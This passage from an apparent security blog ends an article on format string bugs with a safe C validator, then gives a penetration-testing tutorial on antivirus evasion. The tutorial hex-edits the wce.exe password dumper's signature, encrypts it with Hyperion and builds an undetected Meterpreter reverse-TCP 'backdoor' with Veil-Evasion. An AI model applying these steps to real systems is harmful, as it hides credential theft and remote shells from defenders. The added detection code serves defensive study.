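The following C program is an added example (not code from the original article or from any of the tools it names) that puts the countermeasures above, and the probe strings from the detection paragraph, into runnable form. The helpers <code>count_conversions</code>, <code>format_string_is_safe</code>, <code>log_user_message</code> and <code>checked_format</code> are names assumed for this illustration: the first walks a format string the way the printf family does and reports how many arguments it would consume and whether it contains a %n write; the second is the "rigorous input validation" for the rare case where outside data must be part of a format string; the third is the correct constant-format pattern; the fourth shows the gcc/clang <code>format</code> attribute that lets the compiler flag non-literal format strings at build time.

```c
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Walk a format string the way the printf family does and count how many
 * variadic arguments it would consume.  Sets *writes_memory when a %n
 * conversion is present.  Returns -1 for a malformed specification.
 * (Example helper written for this article; not part of any library.) */
int count_conversions(const char *fmt, bool *writes_memory)
{
    int args = 0;
    *writes_memory = false;
    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                              /* "%%" prints a literal '%' */
            continue;
        while (*p != '\0' && strchr("-+ #0", *p))   /* flags */
            p++;
        if (*p == '*') {                            /* width taken from an argument */
            args++;
            p++;
        } else {
            while (*p >= '0' && *p <= '9')
                p++;
        }
        if (*p == '.') {                            /* precision */
            p++;
            if (*p == '*') {
                args++;
                p++;
            } else {
                while (*p >= '0' && *p <= '9')
                    p++;
            }
        }
        while (*p != '\0' && strchr("hlLqjzt", *p)) /* length modifiers */
            p++;
        if (*p == '\0' || !strchr("diouxXeEfFgGaAcspn", *p))
            return -1;                              /* truncated or unknown conversion */
        if (*p == 'n')
            *writes_memory = true;                  /* %n stores the byte count: a write primitive */
        args++;
    }
    return args;
}

/* Input validation for the rare case where outside data must be part of a
 * format string: accept it only if it contains no conversion at all. */
bool format_string_is_safe(const char *s)
{
    bool writes_memory;
    return count_conversions(s, &writes_memory) == 0;
}

/* The correct pattern: the untrusted text is an argument, never the format. */
int log_user_message(char *out, size_t out_size, const char *user_supplied_data)
{
    return snprintf(out, out_size, "user said: %s", user_supplied_data);
}

/* A printf-style wrapper annotated so that gcc/clang check its callers:
 * with -Wformat -Wformat-security, checked_format(buf, n, user_data) warns
 * because the format is not a string literal. */
#if defined(__GNUC__)
#define PRINTF_LIKE(fmt_idx, first_arg) __attribute__((format(printf, fmt_idx, first_arg)))
#else
#define PRINTF_LIKE(fmt_idx, first_arg)
#endif

PRINTF_LIKE(3, 4)
int checked_format(char *out, size_t out_size, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, out_size, fmt, ap);
    va_end(ap);
    return n;
}

int main(void)
{
    /* Constructed inputs in the style of the probe sequences described above. */
    const char *probes[] = { "%x%x%x%x%x%x%x", "%08x%n", "100%% done", "%s%s%s%s" };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        bool writes_memory;
        int n = count_conversions(probes[i], &writes_memory);
        printf("%-16s consumes %d argument(s)%s\n", probes[i], n,
               writes_memory ? " and writes memory via %n" : "");
    }
    char buf[64];
    log_user_message(buf, sizeof buf, "%x%x%n");
    printf("%s\n", buf);   /* the probe is printed verbatim, not interpreted */
    checked_format(buf, sizeof buf, "%zu probes checked", sizeof probes / sizeof probes[0]);
    printf("%s\n", buf);
    return 0;
}
```

Compile with <code>gcc -Wall -Wformat -Wformat-security</code>: the warning the attribute enables is the cheapest detection of all, since it fires on every <code>printf(user_supplied_data)</code>-style call in the build before any runtime probing is needed. The argument counter is the same logic a static checker uses to spot a mismatch between the conversions in a format and the arguments actually supplied, which is exactly the condition that lets the %x and %s probes read the stack.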
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">CONCLUSIONS</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A format string bug is the consequence of poor programming practice: allowing externally supplied, unsanitized data into the format string argument produces an exploitable format string vulnerability. It is an excellent example of what can happen when a function uses untrusted input to determine its own output layout, with security-critical consequences. This editorial introduced the bug and explained its root cause in the context of C code, showed how to detect it, and walked through the details of how exactly the vulnerability works.</div>
</div>
Evasion Tools to Bypass Antivirus Software (published 2016-01-07)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.worldit.info/wp-content/uploads/2009/09/Lista-antivirusi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.worldit.info/wp-content/uploads/2009/09/Lista-antivirusi.png" height="272" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Often during our penetration testing engagements we may have to bypass antivirus applications, especially during the post-exploitation phase, in order to execute certain files on the target machines. Bypassing some antivirus applications is challenging, as there is no standard method or technique that bypasses all antivirus software; different methods have to be tried. This article walks the reader through some of the popular tools available for antivirus evasion.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
File Splitters and Hex editors</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The first technique we are going to discuss is using file-splitting tools to identify the exact signature that is being detected by the antivirus application and then modifying it. This is one of the oldest ways to bypass AV tools, and it is effective when we can locate the exact signature being detected. It has a limitation, however: if we break the functionality of the application, it becomes useless even if it bypasses the antivirus. So, as long as the functionality is not affected while we are changing the signature, we are good to go.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This can be achieved by using a file-splitting tool to split the binary into many parts. This splitting should be done in such a way that each part is larger than the previous one by a fixed amount. Then we need to run the Antivirus scan on these parts to identify which part is flagged first as malicious. We need to do this process repeatedly until the actual signature is located. Tools such as “Dsplit” and “Evade” can be used for file splitting. Once the signature is located, we need to modify it and save the modified binary.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s have a look at an example of how this really works against Antivirus tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I have downloaded wce.exe from the link given below. This is one of the commonly used tools during post-exploitation for dumping passwords in clear text.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Link to download WCE: <a href="http://www.ampliasecurity.com/research/windows-credentials-editor/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.ampliasecurity.com/research/windows-credentials-editor/</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When we scan this tool through virustotal.com, it is flagged as malicious by 47 antivirus engines out of 56.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
By using Dsplit, I have noticed that some antivirus software is detecting it as malicious using its welcome text, which is displayed when we run this tool. Therefore, I opened wce.exe in a hex editor and changed this signature from uppercase to lowercase and vice versa. This is shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv2.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
After making the modifications shown above to the binary, I have scanned it through virustotal.com once again and noticed that 42 antivirus engines out of 56 have flagged it as malicious this time.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv3.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
However, this didn’t bypass most of the antivirus applications; it is possible to do that if we can locate the exact signature that is being detected by those AVs.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When we use the above-mentioned technique, we should not forget about the functionality of the binary while making changes.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As an example, here is the output of original wce.exe dumping the password from memory.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv4.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #44546a; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 1: output of the original wce.exe</em></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The functionality remained the same even after making changes to the binary. It is still able to get the password from the memory as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv5.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #44546a; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 2: output of the modified wce.exe</em></span></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Hyperion</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Encrypting the binary is one of the common ways to bypass antivirus detection. The idea behind an encrypter is to hide the binary from antivirus tools by encrypting it; the binary is decrypted again when it is run. Kali Linux ships an open source encrypter named Hyperion, which can also be downloaded from the link below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="http://nullsecurity.net/tools/binary.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" target="_blank">http://nullsecurity.net/tools/binary.html</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am using the one I have downloaded from the above link. Let us see how we can use this tool.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Before we use Hyperion, let’s first scan the 32-bit version of wce.exe on virustotal.com.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv6.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /><span style="border: 0px; box-sizing: border-box; font-family: 'Times New Roman'; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can see, 44 antivirus engines have flagged this file as malicious.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s encrypt this file with Hyperion as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv7.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s scan this newly generated file once again and see the detection ratio.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv8.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can see in the figure above, the encrypted file is detected by fewer engines than the unencrypted binary.</div>
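The flip side of the encrypter idea, from the defender's seat: encrypted code has near-maximal byte entropy, so a section whose entropy approaches 8 bits per byte is a cheap static hint that a sample deserves a closer look even when no signature matches. The script below is an added example written for this article, not code from the original post or from Hyperion; it parses the PE section table with the standard library and flags high-entropy sections, using a constructed PE container as sample input.

```python
"""Flag PE sections that look encrypted or packed, using Shannon entropy.

Added example for this article, not code from the original post or from
Hyperion. Standard library only; offsets follow the PE/COFF file format.
"""
import math
import struct
from typing import Dict, List, Tuple

ENTROPY_THRESHOLD = 7.2  # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Entropy of data in bits per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(blob: bytes) -> List[Tuple[str, bytes]]:
    """Return (name, raw bytes) for each entry in the section table of a PE file.

    Parses only e_lfanew, the COFF file header and the 40-byte section headers.
    Raises ValueError for anything that is not a well-formed PE image.
    """
    if blob[:2] != b"MZ" or len(blob) < 0x40:
        raise ValueError("not a DOS/PE executable")
    try:
        (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
        if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        coff = e_lfanew + 4
        num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
        opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
        table = coff + 20 + opt_size  # section table follows the optional header
        sections = []
        for i in range(num_sections):
            name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from(
                "<8sIIII", blob, table + 40 * i)
            raw = blob[raw_ptr:raw_ptr + raw_size]
            if len(raw) != raw_size:
                raise ValueError(f"section {name!r} points outside the file")
            sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw))
    except struct.error as exc:
        raise ValueError("truncated PE headers") from exc
    return sections


def suspicious_sections(blob: bytes, threshold: float = ENTROPY_THRESHOLD) -> Dict[str, float]:
    """Map section name to (rounded) entropy for sections at or above the threshold."""
    flagged = {}
    for name, raw in pe_sections(blob):
        if len(raw) < 256:  # tiny sections give noisy entropy estimates; skip them
            continue
        entropy = shannon_entropy(raw)
        if entropy >= threshold:
            flagged[name] = round(entropy, 2)
    return flagged


def build_test_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Wrap the given sections in a minimal, non-runnable PE container (constructed
    test data only: DOS header, PE signature, COFF header with no optional header)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 4 + len(coff) + 40 * len(sections)
    table, body = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), 0x1000,
                             len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(data)
        body += data
    return dos + b"PE\0\0" + coff + table + body


# Constructed section contents: a repetitive code-like pattern, and a stand-in for
# ciphertext in which every byte value is equally likely (entropy exactly 8.0).
CODE_LIKE = b"\x55\x8b\xec\x83\xec\x10" * 500
CIPHERTEXT_LIKE = bytes(range(256)) * 16
SAMPLE_PE = build_test_pe([(".text", CODE_LIKE), (".data", CIPHERTEXT_LIKE)])

if __name__ == "__main__":
    for name, raw in pe_sections(SAMPLE_PE):
        print(f"{name:8s} {len(raw):6d} bytes  entropy {shannon_entropy(raw):.2f}")
    print("flagged:", suspicious_sections(SAMPLE_PE))  # flagged: {'.data': 8.0}
```

Entropy is a heuristic, not a verdict: legitimately compressed resources and signed installers also score high, so treat a hit as a reason to look closer rather than a detection on its own.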
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Veil-Evasion</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Veil-Evasion is another popular framework, written in Python. It can be used to generate payloads that evade the majority of AVs.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Veil-Evasion can be downloaded from its official website.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="https://www.veil-framework.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" target="_blank">https://www.veil-framework.com</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
First download and install Veil-Evasion, then run it using the following command:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: 'Courier New'; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">“veil-evasion”</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv9.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can see, 46 payloads have been loaded. To select a specific payload, we type the “use” command.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv10.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am going to choose option 31 to create the executable payload python/meterpreter/rev_tcp. In fact, it creates a Python script, which is then converted into an executable using a tool such as PyInstaller.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv11.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In the figure above, we have set LHOST to 192.168.56.101 and typed the “generate” command to generate the payload.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Next, it asks us to enter a name for the payload. I named it “backdoor”. As mentioned earlier, Veil converts Python files to an exe, and it asks us to choose which tool we want to use for this step. Personally, I like PyInstaller and I am going for it with option 1. These two steps are shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv12.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Once done, it creates the final payload and prints its location, as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv13.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can see in the figure above, the authors of this framework suggest not submitting these samples online. Therefore, I have checked this payload in a sandboxed environment with Avast Antivirus, and it is not detected.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv14.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
